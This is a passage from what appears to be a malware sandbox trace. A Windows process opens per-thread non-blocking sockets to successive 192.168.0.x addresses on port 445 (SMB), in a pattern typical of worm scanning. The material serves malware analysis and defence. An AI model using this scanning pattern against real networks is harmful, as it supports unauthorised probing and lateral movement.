[0097.694] WSAGetLastError () returned 10035 [0097.694] select (nfds=0, readfds=0x0, writefds=0xd24fd18, exceptfds=0xd24fe20, timeout=0xd24ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 149 os_tid = 0x92c [0097.694] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39817f8 [0097.694] free (_Block=0x39817f8) [0097.695] inet_addr (cp="192.168.0.137") returned 0x8900a8c0 [0097.695] htons (hostshort=0x1bd) returned 0xbd01 [0097.695] socket (af=2, type=1, protocol=6) returned 0xb94 [0097.695] ioctlsocket (in: s=0xb94, cmd=-2147195266, argp=0xd38ff44 | out: argp=0xd38ff44) returned 0 [0097.695] connect (s=0xb94, name=0xd38ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.137"), namelen=16) returned -1 [0097.697] WSAGetLastError () returned 10035 [0097.697] select (nfds=0, readfds=0x0, writefds=0xd38fd18, exceptfds=0xd38fe20, timeout=0xd38ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 150 os_tid = 0x930 [0097.697] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39817d0 [0097.697] free (_Block=0x39817d0) [0097.697] inet_addr (cp="192.168.0.136") returned 0x8800a8c0 [0097.697] htons (hostshort=0x1bd) returned 0xbd01 [0097.697] socket (af=2, type=1, protocol=6) returned 0xba0 [0097.697] ioctlsocket (in: s=0xba0, cmd=-2147195266, argp=0xd4cff44 | out: argp=0xd4cff44) returned 0 [0097.698] connect (s=0xba0, name=0xd4cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.136"), namelen=16) returned -1 [0097.698] WSAGetLastError () returned 10035 [0097.698] select (nfds=0, readfds=0x0, writefds=0xd4cfd18, exceptfds=0xd4cfe20, timeout=0xd4cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 151 os_tid = 0x934 [0097.699] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39817a8 [0097.699] free (_Block=0x39817a8) [0097.699] inet_addr (cp="192.168.0.135") returned 0x8700a8c0 [0097.699] htons (hostshort=0x1bd) returned 0xbd01 [0097.699] socket (af=2, type=1, protocol=6) returned 0xbac [0097.699] ioctlsocket (in: s=0xbac, cmd=-2147195266, argp=0xd60ff44 | out: argp=0xd60ff44) returned 0 [0097.699] connect (s=0xbac, name=0xd60ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.135"), namelen=16) returned -1 [0097.700] WSAGetLastError () returned 10035 [0097.700] select (nfds=0, readfds=0x0, writefds=0xd60fd18, exceptfds=0xd60fe20, timeout=0xd60ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 152 os_tid = 0x938 [0097.700] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981780 [0097.700] free (_Block=0x3981780) [0097.700] inet_addr (cp="192.168.0.134") returned 0x8600a8c0 [0097.700] htons (hostshort=0x1bd) returned 0xbd01 [0097.700] socket (af=2, type=1, protocol=6) returned 0xbb8 [0097.701] ioctlsocket (in: s=0xbb8, cmd=-2147195266, argp=0xd74ff44 | out: argp=0xd74ff44) returned 0 [0097.701] connect (s=0xbb8, name=0xd74ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.134"), namelen=16) returned -1 [0097.701] WSAGetLastError () returned 10035 [0097.701] select (nfds=0, readfds=0x0, writefds=0xd74fd18, exceptfds=0xd74fe20, timeout=0xd74ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 153 os_tid = 0x93c [0097.702] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981758 [0097.702] free (_Block=0x3981758) [0097.702] inet_addr (cp="192.168.0.133") returned 0x8500a8c0 [0097.702] htons (hostshort=0x1bd) returned 0xbd01 [0097.702] socket (af=2, type=1, protocol=6) returned 0xbc4 [0097.704] ioctlsocket (in: s=0xbc4, cmd=-2147195266, argp=0xd88ff44 | out: argp=0xd88ff44) returned 0 [0097.704] connect (s=0xbc4, name=0xd88ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.133"), namelen=16) returned -1 [0097.704] WSAGetLastError () returned 10035 [0097.704] select (nfds=0, readfds=0x0, writefds=0xd88fd18, exceptfds=0xd88fe20, timeout=0xd88ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 154 os_tid = 0x940 [0097.705] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981730 [0097.705] free (_Block=0x3981730) [0097.705] inet_addr (cp="192.168.0.132") returned 0x8400a8c0 [0097.705] htons (hostshort=0x1bd) returned 0xbd01 [0097.705] socket (af=2, type=1, protocol=6) returned 0xbd0 [0097.705] ioctlsocket (in: s=0xbd0, cmd=-2147195266, argp=0xd9cff44 | out: argp=0xd9cff44) returned 0 [0097.705] connect (s=0xbd0, name=0xd9cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.132"), namelen=16) returned -1 [0097.706] WSAGetLastError () returned 10035 [0097.706] select (nfds=0, readfds=0x0, writefds=0xd9cfd18, exceptfds=0xd9cfe20, timeout=0xd9cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 155 os_tid = 0x944 [0097.707] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981708 [0097.707] free (_Block=0x3981708) [0097.707] inet_addr (cp="192.168.0.131") returned 0x8300a8c0 [0097.707] htons (hostshort=0x1bd) returned 0xbd01 [0097.707] socket (af=2, type=1, protocol=6) returned 0xbdc [0097.707] ioctlsocket (in: s=0xbdc, cmd=-2147195266, argp=0xdb0ff44 | out: argp=0xdb0ff44) returned 0 [0097.707] connect (s=0xbdc, name=0xdb0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.131"), namelen=16) returned -1 [0097.708] WSAGetLastError () returned 10035 [0097.708] select (nfds=0, readfds=0x0, writefds=0xdb0fd18, exceptfds=0xdb0fe20, timeout=0xdb0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 156 os_tid = 0x978 [0097.708] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39816e0 [0097.708] free (_Block=0x39816e0) [0097.708] inet_addr (cp="192.168.0.130") returned 0x8200a8c0 [0097.708] htons (hostshort=0x1bd) returned 0xbd01 [0097.708] socket (af=2, type=1, protocol=6) returned 0xbe8 [0097.708] ioctlsocket (in: s=0xbe8, cmd=-2147195266, argp=0xdc4ff44 | out: argp=0xdc4ff44) returned 0 [0097.708] connect (s=0xbe8, name=0xdc4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.130"), namelen=16) returned -1 [0097.709] WSAGetLastError () returned 10035 [0097.709] select (nfds=0, readfds=0x0, writefds=0xdc4fd18, exceptfds=0xdc4fe20, timeout=0xdc4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 157 os_tid = 0x97c [0097.709] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39816b8 [0097.709] free (_Block=0x39816b8) [0097.709] inet_addr (cp="192.168.0.129") returned 0x8100a8c0 [0097.709] htons (hostshort=0x1bd) returned 0xbd01 [0097.709] socket (af=2, type=1, protocol=6) returned 0xbf4 [0097.710] ioctlsocket (in: s=0xbf4, cmd=-2147195266, argp=0xdd8ff44 | out: argp=0xdd8ff44) returned 0 [0097.710] connect (s=0xbf4, name=0xdd8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.129"), namelen=16) returned -1 [0097.710] WSAGetLastError () returned 10035 [0097.710] select (nfds=0, readfds=0x0, writefds=0xdd8fd18, exceptfds=0xdd8fe20, timeout=0xdd8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 158 os_tid = 0x980 [0097.712] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981690 [0097.712] free (_Block=0x3981690) [0097.712] inet_addr (cp="192.168.0.128") returned 0x8000a8c0 [0097.712] htons (hostshort=0x1bd) returned 0xbd01 [0097.712] socket (af=2, type=1, protocol=6) returned 0xc04 [0097.713] ioctlsocket (in: s=0xc04, cmd=-2147195266, argp=0xdecff44 | out: argp=0xdecff44) returned 0 [0097.713] connect (s=0xc04, name=0xdecff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.128"), namelen=16) returned -1 [0097.713] WSAGetLastError () returned 10035 [0097.713] select (nfds=0, readfds=0x0, writefds=0xdecfd18, exceptfds=0xdecfe20, timeout=0xdecff3c*(tv_sec=10, tv_usec=0)) Thread: id = 159 os_tid = 0x984 [0097.714] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981668 [0097.714] free (_Block=0x3981668) [0097.714] inet_addr (cp="192.168.0.127") returned 0x7f00a8c0 [0097.714] htons (hostshort=0x1bd) returned 0xbd01 [0097.714] socket (af=2, type=1, protocol=6) returned 0xc10 [0097.714] ioctlsocket (in: s=0xc10, cmd=-2147195266, argp=0xe00ff44 | out: argp=0xe00ff44) returned 0 [0097.714] connect (s=0xc10, name=0xe00ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.127"), namelen=16) returned -1 [0097.715] WSAGetLastError () returned 10035 [0097.715] select (nfds=0, readfds=0x0, writefds=0xe00fd18, exceptfds=0xe00fe20, timeout=0xe00ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 160 os_tid = 0x988 [0097.715] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981640 [0097.715] free (_Block=0x3981640) [0097.716] inet_addr (cp="192.168.0.126") returned 0x7e00a8c0 [0097.716] htons (hostshort=0x1bd) returned 0xbd01 [0097.716] socket (af=2, type=1, protocol=6) returned 0xc1c [0097.716] ioctlsocket (in: s=0xc1c, cmd=-2147195266, argp=0xe14ff44 | out: argp=0xe14ff44) returned 0 [0097.716] connect (s=0xc1c, name=0xe14ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.126"), namelen=16) returned -1 [0097.718] WSAGetLastError () returned 10035 [0097.718] select (nfds=0, readfds=0x0, writefds=0xe14fd18, exceptfds=0xe14fe20, timeout=0xe14ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 161 os_tid = 0xa6c [0097.718] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981618 [0097.718] free (_Block=0x3981618) [0097.718] inet_addr (cp="192.168.0.125") returned 0x7d00a8c0 [0097.718] htons (hostshort=0x1bd) returned 0xbd01 [0097.718] socket (af=2, type=1, protocol=6) returned 0xc28 [0097.718] ioctlsocket (in: s=0xc28, cmd=-2147195266, argp=0xe28ff44 | out: argp=0xe28ff44) returned 0 [0097.718] connect (s=0xc28, name=0xe28ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.125"), namelen=16) returned -1 [0097.719] WSAGetLastError () returned 10035 [0097.719] select (nfds=0, readfds=0x0, writefds=0xe28fd18, exceptfds=0xe28fe20, timeout=0xe28ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 162 os_tid = 0xa70 [0097.719] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39815f0 [0097.719] free (_Block=0x39815f0) [0097.719] inet_addr (cp="192.168.0.124") returned 0x7c00a8c0 [0097.719] htons (hostshort=0x1bd) returned 0xbd01 [0097.719] socket (af=2, type=1, protocol=6) returned 0xc34 [0097.720] ioctlsocket (in: s=0xc34, cmd=-2147195266, argp=0xe3cff44 | out: argp=0xe3cff44) returned 0 [0097.720] connect (s=0xc34, name=0xe3cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.124"), namelen=16) returned -1 [0097.720] WSAGetLastError () returned 10035 [0097.720] select (nfds=0, readfds=0x0, writefds=0xe3cfd18, exceptfds=0xe3cfe20, timeout=0xe3cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 163 os_tid = 0xa74 [0097.721] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39815c8 [0097.721] free (_Block=0x39815c8) [0097.721] inet_addr (cp="192.168.0.123") returned 0x7b00a8c0 [0097.721] htons (hostshort=0x1bd) returned 0xbd01 [0097.721] socket (af=2, type=1, protocol=6) returned 0xc40 [0097.721] ioctlsocket (in: s=0xc40, cmd=-2147195266, argp=0xe50ff44 | out: argp=0xe50ff44) returned 0 [0097.721] connect (s=0xc40, name=0xe50ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.123"), namelen=16) returned -1 [0097.722] WSAGetLastError () returned 10035 [0097.722] select (nfds=0, readfds=0x0, writefds=0xe50fd18, exceptfds=0xe50fe20, timeout=0xe50ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 164 os_tid = 0xa78 [0097.722] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39815a0 [0097.722] free (_Block=0x39815a0) [0097.722] inet_addr (cp="192.168.0.122") returned 0x7a00a8c0 [0097.722] htons (hostshort=0x1bd) returned 0xbd01 [0097.722] socket (af=2, type=1, protocol=6) returned 0xc4c [0097.722] ioctlsocket (in: s=0xc4c, cmd=-2147195266, argp=0xe64ff44 | out: argp=0xe64ff44) returned 0 [0097.722] connect (s=0xc4c, name=0xe64ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.122"), namelen=16) returned -1 [0097.723] WSAGetLastError () returned 10035 [0097.723] select (nfds=0, readfds=0x0, writefds=0xe64fd18, exceptfds=0xe64fe20, timeout=0xe64ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 165 os_tid = 0xa7c [0097.724] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981578 [0097.724] free (_Block=0x3981578) [0097.724] inet_addr (cp="192.168.0.121") returned 0x7900a8c0 [0097.724] htons (hostshort=0x1bd) returned 0xbd01 [0097.724] socket (af=2, type=1, protocol=6) returned 0xc58 [0097.725] ioctlsocket (in: s=0xc58, cmd=-2147195266, argp=0xe78ff44 | out: argp=0xe78ff44) returned 0 [0097.725] connect (s=0xc58, name=0xe78ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.121"), namelen=16) returned -1 [0097.725] WSAGetLastError () returned 10035 [0097.725] select (nfds=0, readfds=0x0, writefds=0xe78fd18, exceptfds=0xe78fe20, timeout=0xe78ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 166 os_tid = 0xa80 [0097.726] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981550 [0097.726] free (_Block=0x3981550) [0097.726] inet_addr (cp="192.168.0.120") returned 0x7800a8c0 [0097.726] htons (hostshort=0x1bd) returned 0xbd01 [0097.726] socket (af=2, type=1, protocol=6) returned 0xc64 [0097.726] ioctlsocket (in: s=0xc64, cmd=-2147195266, argp=0xe8cff44 | out: argp=0xe8cff44) returned 0 [0097.726] connect (s=0xc64, name=0xe8cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.120"), namelen=16) returned -1 [0097.727] WSAGetLastError () returned 10035 [0097.727] select (nfds=0, readfds=0x0, writefds=0xe8cfd18, exceptfds=0xe8cfe20, timeout=0xe8cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 167 os_tid = 0xa84 [0097.821] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981528 [0097.821] free (_Block=0x3981528) [0097.821] inet_addr (cp="192.168.0.119") returned 0x7700a8c0 [0097.821] htons (hostshort=0x1bd) returned 0xbd01 [0097.822] socket (af=2, type=1, protocol=6) returned 0xd00 [0097.822] ioctlsocket (in: s=0xd00, cmd=-2147195266, argp=0xea0ff44 | out: argp=0xea0ff44) returned 0 [0097.822] connect (s=0xd00, name=0xea0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.119"), namelen=16) returned -1 [0097.838] WSAGetLastError () returned 10035 [0097.839] select (nfds=0, readfds=0x0, writefds=0xea0fd18, exceptfds=0xea0fe20, timeout=0xea0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 168 os_tid = 0xa88 [0097.839] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981500 [0097.839] free (_Block=0x3981500) [0097.839] inet_addr (cp="192.168.0.118") returned 0x7600a8c0 [0097.839] htons (hostshort=0x1bd) returned 0xbd01 [0097.839] socket (af=2, type=1, protocol=6) returned 0xd0c [0097.840] ioctlsocket (in: s=0xd0c, cmd=-2147195266, argp=0xeb4ff44 | out: argp=0xeb4ff44) returned 0 [0097.840] connect (s=0xd0c, name=0xeb4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.118"), namelen=16) returned -1 [0097.841] WSAGetLastError () returned 10035 [0097.841] select (nfds=0, readfds=0x0, writefds=0xeb4fd18, exceptfds=0xeb4fe20, timeout=0xeb4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 169 os_tid = 0xa8c [0097.841] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39814d8 [0097.841] free (_Block=0x39814d8) [0097.841] inet_addr (cp="192.168.0.117") returned 0x7500a8c0 [0097.841] htons (hostshort=0x1bd) returned 0xbd01 [0097.841] socket (af=2, type=1, protocol=6) returned 0xd18 [0097.841] ioctlsocket (in: s=0xd18, cmd=-2147195266, argp=0xec8ff44 | out: argp=0xec8ff44) returned 0 [0097.842] connect (s=0xd18, name=0xec8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.117"), namelen=16) returned -1 [0097.842] WSAGetLastError () returned 10035 [0097.842] select (nfds=0, readfds=0x0, writefds=0xec8fd18, exceptfds=0xec8fe20, timeout=0xec8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 170 os_tid = 0xa90 [0097.843] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981480 [0097.843] free (_Block=0x3981480) [0097.843] inet_addr (cp="192.168.0.116") returned 0x7400a8c0 [0097.843] htons (hostshort=0x1bd) returned 0xbd01 [0097.843] socket (af=2, type=1, protocol=6) returned 0xd24 [0097.843] ioctlsocket (in: s=0xd24, cmd=-2147195266, argp=0xedcff44 | out: argp=0xedcff44) returned 0 [0097.843] connect (s=0xd24, name=0xedcff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.116"), namelen=16) returned -1 [0097.844] WSAGetLastError () returned 10035 [0097.844] select (nfds=0, readfds=0x0, writefds=0xedcfd18, exceptfds=0xedcfe20, timeout=0xedcff3c*(tv_sec=10, tv_usec=0)) Thread: id = 171 os_tid = 0xa94 [0097.844] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981458 [0097.844] free (_Block=0x3981458) [0097.844] inet_addr (cp="192.168.0.115") returned 0x7300a8c0 [0097.844] htons (hostshort=0x1bd) returned 0xbd01 [0097.845] socket (af=2, type=1, protocol=6) returned 0xd30 [0097.845] ioctlsocket (in: s=0xd30, cmd=-2147195266, argp=0xef0ff44 | out: argp=0xef0ff44) returned 0 [0097.845] connect (s=0xd30, name=0xef0ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.115"), namelen=16) returned -1 [0097.845] WSAGetLastError () returned 10035 [0097.846] select (nfds=0, readfds=0x0, writefds=0xef0fd18, exceptfds=0xef0fe20, timeout=0xef0ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 172 os_tid = 0xa98 [0097.846] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981430 [0097.846] free (_Block=0x3981430) [0097.846] inet_addr (cp="192.168.0.114") returned 0x7200a8c0 [0097.846] htons (hostshort=0x1bd) returned 0xbd01 [0097.846] socket (af=2, type=1, protocol=6) returned 0xd3c [0097.846] ioctlsocket (in: s=0xd3c, cmd=-2147195266, argp=0xf04ff44 | out: argp=0xf04ff44) returned 0 [0097.846] connect (s=0xd3c, name=0xf04ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.114"), namelen=16) returned -1 [0097.847] WSAGetLastError () returned 10035 [0097.847] select (nfds=0, readfds=0x0, writefds=0xf04fd18, exceptfds=0xf04fe20, timeout=0xf04ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 173 os_tid = 0xa9c [0097.847] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981408 [0097.847] free (_Block=0x3981408) [0097.847] inet_addr (cp="192.168.0.113") returned 0x7100a8c0 [0097.847] htons (hostshort=0x1bd) returned 0xbd01 [0097.847] socket (af=2, type=1, protocol=6) returned 0xd48 [0097.848] ioctlsocket (in: s=0xd48, cmd=-2147195266, argp=0xf18ff44 | out: argp=0xf18ff44) returned 0 [0097.848] connect (s=0xd48, name=0xf18ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.113"), namelen=16) returned -1 [0097.848] WSAGetLastError () returned 10035 [0097.848] select (nfds=0, readfds=0x0, writefds=0xf18fd18, exceptfds=0xf18fe20, timeout=0xf18ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 174 os_tid = 0xaa0 [0097.849] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39813e0 [0097.849] free (_Block=0x39813e0) [0097.849] inet_addr (cp="192.168.0.112") returned 0x7000a8c0 [0097.849] htons (hostshort=0x1bd) returned 0xbd01 [0097.849] socket (af=2, type=1, protocol=6) returned 0xd54 [0097.850] ioctlsocket (in: s=0xd54, cmd=-2147195266, argp=0xf2cff44 | out: argp=0xf2cff44) returned 0 [0097.850] connect (s=0xd54, name=0xf2cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.112"), namelen=16) returned -1 [0097.851] WSAGetLastError () returned 10035 [0097.851] select (nfds=0, readfds=0x0, writefds=0xf2cfd18, exceptfds=0xf2cfe20, timeout=0xf2cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 175 os_tid = 0xaa4 [0097.851] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39813b8 [0097.851] free (_Block=0x39813b8) [0097.851] inet_addr (cp="192.168.0.111") returned 0x6f00a8c0 [0097.851] htons (hostshort=0x1bd) returned 0xbd01 [0097.851] socket (af=2, type=1, protocol=6) returned 0xd60 [0097.852] ioctlsocket (in: s=0xd60, cmd=-2147195266, argp=0xf40ff44 | out: argp=0xf40ff44) returned 0 [0097.852] connect (s=0xd60, name=0xf40ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.111"), namelen=16) returned -1 [0097.852] WSAGetLastError () returned 10035 [0097.852] select (nfds=0, readfds=0x0, writefds=0xf40fd18, exceptfds=0xf40fe20, timeout=0xf40ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 176 os_tid = 0xaa8 [0097.853] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981390 [0097.853] free (_Block=0x3981390) [0097.853] inet_addr (cp="192.168.0.110") returned 0x6e00a8c0 [0097.853] htons (hostshort=0x1bd) returned 0xbd01 [0097.853] socket (af=2, type=1, protocol=6) returned 0xd6c [0097.853] ioctlsocket (in: s=0xd6c, cmd=-2147195266, argp=0xf54ff44 | out: argp=0xf54ff44) returned 0 [0097.853] connect (s=0xd6c, name=0xf54ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.110"), namelen=16) returned -1 [0097.855] WSAGetLastError () returned 10035 [0097.855] select (nfds=0, readfds=0x0, writefds=0xf54fd18, exceptfds=0xf54fe20, timeout=0xf54ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 177 os_tid = 0xaac [0097.856] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981368 [0097.856] free (_Block=0x3981368) [0097.856] inet_addr (cp="192.168.0.109") returned 0x6d00a8c0 [0097.856] htons (hostshort=0x1bd) returned 0xbd01 [0097.856] socket (af=2, type=1, protocol=6) returned 0xd78 [0097.856] ioctlsocket (in: s=0xd78, cmd=-2147195266, argp=0xf68ff44 | out: argp=0xf68ff44) returned 0 [0097.856] connect (s=0xd78, name=0xf68ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.109"), namelen=16) returned -1 [0097.857] WSAGetLastError () returned 10035 [0097.857] select (nfds=0, readfds=0x0, writefds=0xf68fd18, exceptfds=0xf68fe20, timeout=0xf68ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 178 os_tid = 0xab0 [0097.857] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981340 [0097.857] free (_Block=0x3981340) [0097.857] inet_addr (cp="192.168.0.108") returned 0x6c00a8c0 [0097.857] htons (hostshort=0x1bd) returned 0xbd01 [0097.857] socket (af=2, type=1, protocol=6) returned 0xd84 [0097.858] ioctlsocket (in: s=0xd84, cmd=-2147195266, argp=0xf7cff44 | out: argp=0xf7cff44) returned 0 [0097.858] connect (s=0xd84, name=0xf7cff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.108"), namelen=16) returned -1 [0097.859] WSAGetLastError () returned 10035 [0097.859] select (nfds=0, readfds=0x0, writefds=0xf7cfd18, exceptfds=0xf7cfe20, timeout=0xf7cff3c*(tv_sec=10, tv_usec=0)) Thread: id = 179 os_tid = 0xab4 [0097.859] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981318 [0097.859] free (_Block=0x3981318) [0097.859] inet_addr (cp="192.168.0.107") returned 0x6b00a8c0 [0097.859] htons (hostshort=0x1bd) returned 0xbd01 [0097.859] socket (af=2, type=1, protocol=6) returned 0xd90 [0097.862] ioctlsocket (in: s=0xd90, cmd=-2147195266, argp=0xf90ff44 | out: argp=0xf90ff44) returned 0 [0097.862] connect (s=0xd90, name=0xf90ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.107"), namelen=16) returned -1 [0097.864] WSAGetLastError () returned 10035 [0097.864] select (nfds=0, readfds=0x0, writefds=0xf90fd18, exceptfds=0xf90fe20, timeout=0xf90ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 180 os_tid = 0xab8 [0097.864] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39812f0 [0097.864] free (_Block=0x39812f0) [0097.864] inet_addr (cp="192.168.0.106") returned 0x6a00a8c0 [0097.864] htons (hostshort=0x1bd) returned 0xbd01 [0097.864] socket (af=2, type=1, protocol=6) returned 0xd9c [0097.865] ioctlsocket (in: s=0xd9c, cmd=-2147195266, argp=0xfa4ff44 | out: argp=0xfa4ff44) returned 0 [0097.865] connect (s=0xd9c, name=0xfa4ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.106"), namelen=16) returned -1 [0097.865] WSAGetLastError () returned 10035 [0097.865] select (nfds=0, readfds=0x0, writefds=0xfa4fd18, exceptfds=0xfa4fe20, timeout=0xfa4ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 181 os_tid = 0xabc [0097.866] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39812c8 [0097.866] free (_Block=0x39812c8) [0097.866] inet_addr (cp="192.168.0.105") returned 0x6900a8c0 [0097.866] htons (hostshort=0x1bd) returned 0xbd01 [0097.866] socket (af=2, type=1, protocol=6) returned 0xda8 [0097.866] ioctlsocket (in: s=0xda8, cmd=-2147195266, argp=0xfb8ff44 | out: argp=0xfb8ff44) returned 0 [0097.866] connect (s=0xda8, name=0xfb8ff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.105"), namelen=16) returned -1 [0097.867] WSAGetLastError () returned 10035 [0097.867] select (nfds=0, readfds=0x0, writefds=0xfb8fd18, exceptfds=0xfb8fe20, timeout=0xfb8ff3c*(tv_sec=10, tv_usec=0)) Thread: id = 182 os_tid = 0xac0 [0097.867] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x39812a0 [0097.867] free (_Block=0x39812a0) [0097.867] inet_addr (cp="192.168.0.104") returned 0x6800a8c0 [0097.868] htons (hostshort=0x1bd) returned 0xbd01 [0097.868] socket (af=2, type=1, protocol=6) returned 0xdb4 [0097.868] ioctlsocket (in: s=0xdb4, cmd=-2147195266, argp=0xfccff44 | out: argp=0xfccff44) returned 0 [0097.868] connect (s=0xdb4, name=0xfccff2c*(sa_family=2, sin_port=0x1bd, sin_addr="192.168.0.104"), namelen=16) returned -1 [0097.869] WSAGetLastError () returned 10035 [0097.869] select (nfds=0, readfds=0x0, writefds=0xfccfd18, exceptfds=0xfccfe20, timeout=0xfccff3c*(tv_sec=10, tv_usec=0)) Thread: id = 183 os_tid = 0xac4 [0097.869] RtlInterlockedPopEntrySList (in: ListHead=0x2064bd0 | out: ListHead=0x2064bd0) returned 0x3981278 [0097.869] free (_Block=0x3981278) [0097.869] inet_addr (cp="192.168.0.103") returned 0x6700a8c0 [0097.869] htons (hostshort=0x1bd) returned 0xbd01 [0097.869] socket (af=2, type=1, 